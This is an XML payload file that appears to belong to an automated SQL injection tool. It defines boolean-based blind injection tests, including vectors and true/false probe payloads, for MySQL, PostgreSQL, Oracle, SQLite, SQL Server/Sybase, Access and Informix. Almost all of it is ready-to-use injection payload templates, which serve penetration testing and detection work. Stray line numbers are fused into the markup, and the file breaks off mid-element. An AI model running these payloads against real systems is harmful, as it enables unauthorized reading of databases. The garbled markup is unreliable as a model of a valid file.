<?xml version="1.0" encoding="UTF-8"?>

<!--
Tag: <test>
SQL injection test definition.

Sub-tag: <title>
Title of the test.

Sub-tag: <stype>
SQL injection family type.

Valid values:
1: Boolean-based blind SQL injection
2: Error-based queries SQL injection
3: Inline queries SQL injection
4: Stacked queries SQL injection
5: Time-based blind SQL injection
6: UNION query SQL injection

Sub-tag: <level>
From which level on this test is performed.

Valid values:
1: Always (<100 requests)
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)

Sub-tag: <risk>
Likelihood that a payload damages data integrity.

Valid values:
1: Low risk
2: Medium risk
3: High risk

Sub-tag: <clause>
In which clause the payload can work.

NOTE: for instance, there are some payloads that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.

Valid values:
0: Always
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name
9: Pre-WHERE (non-query)

A comma-separated list of these values is also possible.

Sub-tag: <where>
Where to add our '<prefix> <payload><comment> <suffix>' string.

Valid values:
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string

Sub-tag: <vector>
The payload that will be used to exploit the injection point.

Sub-tag: <request>
What to inject for this test.

Sub-tag: <payload>
The payload to test for.

Sub-tag: <comment>
Comment to append to the payload, before the suffix.

Sub-tag: <char>
Character to use to brute-force the number of columns in UNION
query SQL injection tests.

Sub-tag: <columns>
Range of columns to test for in
UNION query SQL injection
tests.

Sub-tag: <response>
How to identify if the injected payload succeeded.

Sub-tag: <comparison>
Perform a request with this string as the payload and compare
the response with the <payload> response. Apply the comparison
algorithm.

NOTE: useful to test for boolean-based blind SQL injections.

Sub-tag: <grep>
Regular expression to grep for in the response body.

NOTE: useful to test for error-based SQL injection.

Sub-tag: <time>
Time in seconds to wait before the response is returned.

NOTE: useful to test for time-based blind and stacked queries
SQL injections.

Sub-tag: <union>
Calls the unionTest() function.

NOTE: useful to test for UNION query (inband) SQL injection.

Sub-tag: <details>
Which details can be inferred if the payload succeeds.

Sub-tag: <dbms>
What is the database management system (e.g. MySQL).

Sub-tag: <dbms_version>
What is the database management system version (e.g. 5.0.51).

Sub-tag: <os>
What is the database management system underlying operating
system.

<test>
    <title></title>
    <stype></stype>
    <level></level>
    <risk></risk>
    <clause></clause>
    <where></where>
    <vector></vector>
    <request>
        <payload></payload>
        <comment></comment>
        <char></char>
        <columns></columns>
    </request>
    <response>
        <comparison></comparison>
        <grep></grep>
        <time></time>
        <union></union>
    </response>
    <details>
        <dbms></dbms>
        <dbms_version></dbms_version>
        <os></os>
    </details>
</test>
-->

<root>
    <!-- Boolean-based blind tests - WHERE/HAVING clause -->
    <test>
        <title>AND boolean-based blind - WHERE or HAVING clause</title>
        <stype>1</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>AND [INFERENCE]</vector>
        <request>
            <payload>AND [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>AND
[RANDNUM]=[RANDNUM1]</comparison>170</response>171</test>172173<test>174<title>OR boolean-based blind - WHERE or HAVING clause</title>175<stype>1</stype>176<level>1</level>177<risk>3</risk>178<clause>1,9</clause>179<where>2</where>180<vector>OR [INFERENCE]</vector>181<request>182<payload>OR [RANDNUM]=[RANDNUM]</payload>183</request>184<response>185<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>186</response>187</test>188189<test>190<title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>191<stype>1</stype>192<level>3</level>193<risk>3</risk>194<clause>1,9</clause>195<where>1</where>196<vector>OR NOT [INFERENCE]</vector>197<request>198<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>199</request>200<response>201<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>202</response>203</test>204205<test>206<title>AND boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>207<stype>1</stype>208<level>2</level>209<risk>1</risk>210<clause>1,8,9</clause>211<where>1</where>212<vector>AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>213<request>214<payload>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>215<comment>[GENERIC_SQL_COMMENT]</comment>216</request>217<response>218<comparison>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>219</response>220</test>221222<test>223<title>OR boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>224<stype>1</stype>225<level>2</level>226<risk>3</risk>227<clause>1,9</clause>228<where>2</where>229<vector>OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>230<request>231<payload>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION 
SELECT [RANDNUM2]) END))</payload>232<comment>[GENERIC_SQL_COMMENT]</comment>233</request>234<response>235<comparison>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>236</response>237</test>238239<test>240<title>AND boolean-based blind - WHERE or HAVING clause (comment)</title>241<stype>1</stype>242<level>2</level>243<risk>1</risk>244<clause>1</clause>245<where>1</where>246<vector>AND [INFERENCE]</vector>247<request>248<payload>AND [RANDNUM]=[RANDNUM]</payload>249<comment>[GENERIC_SQL_COMMENT]</comment>250</request>251<response>252<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>253</response>254</test>255256<test>257<title>OR boolean-based blind - WHERE or HAVING clause (comment)</title>258<stype>1</stype>259<level>2</level>260<risk>3</risk>261<clause>1</clause>262<where>2</where>263<vector>OR [INFERENCE]</vector>264<request>265<payload>OR [RANDNUM]=[RANDNUM]</payload>266<comment>[GENERIC_SQL_COMMENT]</comment>267</request>268<response>269<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>270</response>271</test>272273<test>274<title>OR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title>275<stype>1</stype>276<level>4</level>277<risk>3</risk>278<clause>1</clause>279<where>1</where>280<vector>OR NOT [INFERENCE]</vector>281<request>282<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>283<comment>[GENERIC_SQL_COMMENT]</comment>284</request>285<response>286<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>287</response>288</test>289290<test>291<title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>292<stype>1</stype>293<level>3</level>294<risk>1</risk>295<clause>1</clause>296<where>1</where>297<vector>AND [INFERENCE]</vector>298<request>299<payload>AND [RANDNUM]=[RANDNUM]</payload>300<comment>#</comment>301</request>302<response>303<comparison>AND 
[RANDNUM]=[RANDNUM1]</comparison>304</response>305<details>306<dbms>MySQL</dbms>307</details>308</test>309310<test>311<title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>312<stype>1</stype>313<level>3</level>314<risk>3</risk>315<clause>1</clause>316<where>2</where>317<vector>OR [INFERENCE]</vector>318<request>319<payload>OR [RANDNUM]=[RANDNUM]</payload>320<comment>#</comment>321</request>322<response>323<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>324</response>325<details>326<dbms>MySQL</dbms>327</details>328</test>329330<test>331<title>OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title>332<stype>1</stype>333<level>3</level>334<risk>3</risk>335<clause>1</clause>336<where>1</where>337<vector>OR NOT [INFERENCE]</vector>338<request>339<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>340<comment>#</comment>341</request>342<response>343<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>344</response>345<details>346<dbms>MySQL</dbms>347</details>348</test>349350<test>351<title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>352<stype>1</stype>353<level>3</level>354<risk>1</risk>355<clause>1</clause>356<where>1</where>357<vector>AND [INFERENCE]</vector>358<request>359<payload>AND [RANDNUM]=[RANDNUM]</payload>360<comment>%16</comment>361</request>362<response>363<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>364</response>365<details>366<dbms>Microsoft Access</dbms>367</details>368</test>369370<test>371<title>OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>372<stype>1</stype>373<level>3</level>374<risk>3</risk>375<clause>1</clause>376<where>2</where>377<vector>OR [INFERENCE]</vector>378<request>379<payload>OR [RANDNUM]=[RANDNUM]</payload>380<comment>%16</comment>381</request>382<response>383<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>384</response>385<details>386<dbms>Microsoft Access</dbms>387</details>388</test>389390<test>391<title>MySQL RLIKE 
boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title>392<stype>1</stype>393<level>2</level>394<risk>1</risk>395<clause>1,2,3</clause>396<where>1</where>397<vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>398<request>399<payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>400</request>401<response>402<comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>403</response>404<details>405<dbms>MySQL</dbms>406</details>407</test>408409<test>410<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>411<stype>1</stype>412<level>3</level>413<risk>1</risk>414<clause>1,2,3,8</clause>415<where>1</where>416<vector>AND MAKE_SET([INFERENCE],[RANDNUM])</vector>417<request>418<payload>AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>419</request>420<response>421<comparison>AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>422</response>423<details>424<dbms>MySQL</dbms>425</details>426</test>427428<test>429<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>430<stype>1</stype>431<level>3</level>432<risk>3</risk>433<clause>1,2,3</clause>434<where>2</where>435<vector>OR MAKE_SET([INFERENCE],[RANDNUM])</vector>436<request>437<payload>OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>438</request>439<response>440<comparison>OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>441</response>442<details>443<dbms>MySQL</dbms>444</details>445</test>446447<test>448<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>449<stype>1</stype>450<level>4</level>451<risk>1</risk>452<clause>1,2,3,8</clause>453<where>1</where>454<vector>AND ELT([INFERENCE],[RANDNUM])</vector>455<request>456<payload>AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>457</request>458<response>459<comparison>AND 
ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>460</response>461<details>462<dbms>MySQL</dbms>463</details>464</test>465466<test>467<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>468<stype>1</stype>469<level>4</level>470<risk>3</risk>471<clause>1,2,3</clause>472<where>2</where>473<vector>OR ELT([INFERENCE],[RANDNUM])</vector>474<request>475<payload>OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>476</request>477<response>478<comparison>OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>479</response>480<details>481<dbms>MySQL</dbms>482</details>483</test>484485<test>486<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>487<stype>1</stype>488<level>5</level>489<risk>1</risk>490<clause>1,2,3,8</clause>491<where>1</where>492<vector>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>493<request>494<payload>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>495</request>496<response>497<comparison>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>498</response>499<details>500<dbms>MySQL</dbms>501</details>502</test>503504<test>505<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>506<stype>1</stype>507<level>5</level>508<risk>3</risk>509<clause>1,2,3,8</clause>510<where>2</where>511<vector>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>512<request>513<payload>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>514</request>515<response>516<comparison>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>517</response>518<details>519<dbms>MySQL</dbms>520</details>521</test>522523<test>524<title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause 
(CAST)</title>525<stype>1</stype>526<level>2</level>527<risk>1</risk>528<clause>1,8</clause>529<where>1</where>530<vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>531<request>532<payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>533</request>534<response>535<comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>536</response>537<details>538<dbms>PostgreSQL</dbms>539</details>540</test>541542<test>543<title>PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)</title>544<stype>1</stype>545<level>3</level>546<risk>3</risk>547<clause>1</clause>548<where>2</where>549<vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>550<request>551<payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>552</request>553<response>554<comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>555</response>556<details>557<dbms>PostgreSQL</dbms>558</details>559</test>560561<test>562<title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>563<stype>1</stype>564<level>2</level>565<risk>1</risk>566<clause>1</clause>567<where>1</where>568<vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>569<request>570<payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>571</request>572<response>573<comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS 
NULL</comparison>574</response>575<details>576<dbms>Oracle</dbms>577</details>578</test>579580<test>581<title>Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>582<stype>1</stype>583<level>3</level>584<risk>3</risk>585<clause>1</clause>586<where>2</where>587<vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>588<request>589<payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>590</request>591<response>592<comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</comparison>593</response>594<details>595<dbms>Oracle</dbms>596</details>597</test>598599<test>600<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>601<stype>1</stype>602<level>2</level>603<risk>1</risk>604<clause>1</clause>605<where>1</where>606<vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>607<request>608<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>609</request>610<response>611<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>612</response>613<details>614<dbms>SQLite</dbms>615</details>616</test>617618<test>619<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>620<stype>1</stype>621<level>3</level>622<risk>3</risk>623<clause>1</clause>624<where>2</where>625<vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>626<request>627<payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>628</request>629<response>630<comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') 
END</comparison>631</response>632<details>633<dbms>SQLite</dbms>634</details>635</test>636637<!-- End of boolean-based blind tests - WHERE or HAVING clause -->638639<!-- Boolean-based blind tests - Parameter replace -->640<test>641<title>Boolean-based blind - Parameter replace (original value)</title>642<stype>1</stype>643<level>1</level>644<risk>1</risk>645<clause>1,2,3</clause>646<where>3</where>647<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>648<request>649<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>650</request>651<response>652<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>653</response>654</test>655656<test>657<title>MySQL boolean-based blind - Parameter replace (MAKE_SET)</title>658<stype>1</stype>659<level>4</level>660<risk>1</risk>661<clause>1,2,3</clause>662<where>3</where>663<vector>MAKE_SET([INFERENCE],[RANDNUM])</vector>664<request>665<payload>MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>666</request>667<response>668<comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>669</response>670<details>671<dbms>MySQL</dbms>672</details>673</test>674675<test>676<title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>677<stype>1</stype>678<level>5</level>679<risk>1</risk>680<clause>1,2,3</clause>681<where>3</where>682<vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>683<request>684<payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>685</request>686<response>687<comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>688</response>689<details>690<dbms>MySQL</dbms>691</details>692</test>693694<test>695<title>MySQL boolean-based blind - Parameter replace 
(ELT)</title>696<stype>1</stype>697<level>4</level>698<risk>1</risk>699<clause>1,2,3</clause>700<where>3</where>701<vector>ELT([INFERENCE],[RANDNUM])</vector>702<request>703<payload>ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>704</request>705<response>706<comparison>ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>707</response>708<details>709<dbms>MySQL</dbms>710</details>711</test>712713<test>714<title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>715<stype>1</stype>716<level>5</level>717<risk>1</risk>718<clause>1,2,3</clause>719<where>3</where>720<vector>ELT([INFERENCE],[ORIGVALUE])</vector>721<request>722<payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>723</request>724<response>725<comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>726</response>727<details>728<dbms>MySQL</dbms>729</details>730</test>731732<test>733<title>MySQL boolean-based blind - Parameter replace (bool*int)</title>734<stype>1</stype>735<level>4</level>736<risk>1</risk>737<clause>1,2,3</clause>738<where>3</where>739<vector>([INFERENCE])*[RANDNUM]</vector>740<request>741<payload>([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>742</request>743<response>744<comparison>([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>745</response>746<details>747<dbms>MySQL</dbms>748</details>749</test>750751<test>752<title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>753<stype>1</stype>754<level>5</level>755<risk>1</risk>756<clause>1,2,3</clause>757<where>3</where>758<vector>([INFERENCE])*[ORIGVALUE]</vector>759<request>760<payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>761</request>762<response>763<comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>764</response>765<details>766<dbms>MySQL</dbms>767</details>768</test>769770<test>771<title>PostgreSQL boolean-based blind - Parameter replace</title>772<stype>1</stype>773<level>3</level>774<risk>1</risk>775<clause>1,2,3</clause>776<where>3</where>777<vector>(SELECT (CASE WHEN 
([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>778<request>779<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>780</request>781<response>782<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>783</response>784<details>785<dbms>PostgreSQL</dbms>786</details>787</test>788789<test>790<title>PostgreSQL boolean-based blind - Parameter replace (original value)</title>791<stype>1</stype>792<level>4</level>793<risk>1</risk>794<clause>1,2,3</clause>795<where>3</where>796<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>797<request>798<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>799</request>800<response>801<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>802</response>803<details>804<dbms>PostgreSQL</dbms>805</details>806</test>807808<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->809<test>810<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>811<stype>1</stype>812<level>5</level>813<risk>1</risk>814<clause>1,2,3</clause>815<where>3</where>816<vector>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>817<request>818<payload>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>819</request>820<response>821<comparison>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>822</response>823<details>824<dbms>PostgreSQL</dbms>825</details>826</test>827828<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->829<test>830<title>PostgreSQL boolean-based blind - Parameter replace 
(GENERATE_SERIES - original value)</title>831<stype>1</stype>832<level>5</level>833<risk>1</risk>834<clause>1,2,3</clause>835<where>3</where>836<vector>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>837<request>838<payload>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>839</request>840<response>841<comparison>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>842</response>843<details>844<dbms>PostgreSQL</dbms>845</details>846</test>847848<test>849<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>850<stype>1</stype>851<level>3</level>852<risk>1</risk>853<clause>1,3</clause>854<where>3</where>855<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>856<request>857<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>858</request>859<response>860<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>861</response>862<details>863<dbms>Microsoft SQL Server</dbms>864<dbms>Sybase</dbms>865</details>866</test>867868<test>869<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>870<stype>1</stype>871<level>4</level>872<risk>1</risk>873<clause>1,3</clause>874<where>3</where>875<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>876<request>877<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) 
END))</payload>878</request>879<response>880<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>881</response>882<details>883<dbms>Microsoft SQL Server</dbms>884<dbms>Sybase</dbms>885</details>886</test>887888<test>889<title>Oracle boolean-based blind - Parameter replace</title>890<stype>1</stype>891<level>3</level>892<risk>1</risk>893<clause>1,3</clause>894<where>3</where>895<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>896<request>897<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>898</request>899<response>900<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>901</response>902<details>903<dbms>Oracle</dbms>904</details>905</test>906907<test>908<title>Oracle boolean-based blind - Parameter replace (original value)</title>909<stype>1</stype>910<level>4</level>911<risk>1</risk>912<clause>1,3</clause>913<where>3</where>914<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>915<request>916<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>917</request>918<response>919<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>920</response>921<details>922<dbms>Oracle</dbms>923</details>924</test>925926<test>927<title>Informix boolean-based blind - Parameter replace</title>928<stype>1</stype>929<level>3</level>930<risk>1</risk>931<clause>1,3</clause>932<where>3</where>933<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>934<request>935<payload>(SELECT 
(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>936</request>937<response>938<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>939</response>940<details>941<dbms>Informix</dbms>942</details>943</test>944945<test>946<title>Informix boolean-based blind - Parameter replace (original value)</title>947<stype>1</stype>948<level>4</level>949<risk>1</risk>950<clause>1,3</clause>951<where>3</where>952<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>953<request>954<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>955</request>956<response>957<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM 